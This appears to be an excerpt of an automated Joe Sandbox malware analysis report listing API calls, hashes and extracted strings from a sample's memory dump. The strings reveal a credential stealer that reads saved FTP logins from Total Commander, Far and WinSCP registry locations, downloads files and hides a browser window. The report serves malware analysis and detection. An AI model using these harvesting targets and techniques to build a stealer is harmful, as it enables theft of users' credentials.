                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 302 4077f0-407829 call 40d530 CreateProcessW
                          APIs
                          • _memset.LIBCMT ref: 00407800
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateProcess_memset
                          • String ID:
                          • API String ID: 1177741608-0
                          • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                          • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 312 4069c0-4069fc RegQueryValueExW RegCloseKey
                          APIs
                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 313 406d14-406d20 InternetAttemptConnect 314 406d22-406d25 313->314 315 406d26-406d41 InternetOpenW 313->315
                          APIs
                          • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$AttemptConnectOpen
                          • String ID:
                          • API String ID: 2984283330-0
                          • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                          • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                          • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                          • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                          • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                          • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfileString$AllocHeap
                          • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                          • API String ID: 2479592106-2015850556
                          • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                          • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58
                          APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 004027F5
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$InitializeOpenOption
                          • String ID: From: true
                          • API String ID: 1176259655-9585188
                          • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                          • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 11d3048b97e390bc55daf18a5165622c721ea4f879a8cde4a2ec179576955272
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Opcode Fuzzy Hash: 11d3048b97e390bc55daf18a5165622c721ea4f879a8cde4a2ec179576955272
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                          • RegCloseKey.ADVAPI32(?), ref: 0040442A
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapOpen$AllocCloseEnumFree
                          • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                          • API String ID: 416369273-4007225339
                          • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                          • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          • API String ID: 1987340527-3375436608
                          • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                          • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          • API String ID: 3472027048-2333287219
                          • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                          • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          • API String ID: 1473721057-3317424838
                          • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                          • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          • API String ID: 3546245721-1332223170
                          • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                          • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                          APIs
                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          • API String ID: 2141107913-3455059086
                          • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                          • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
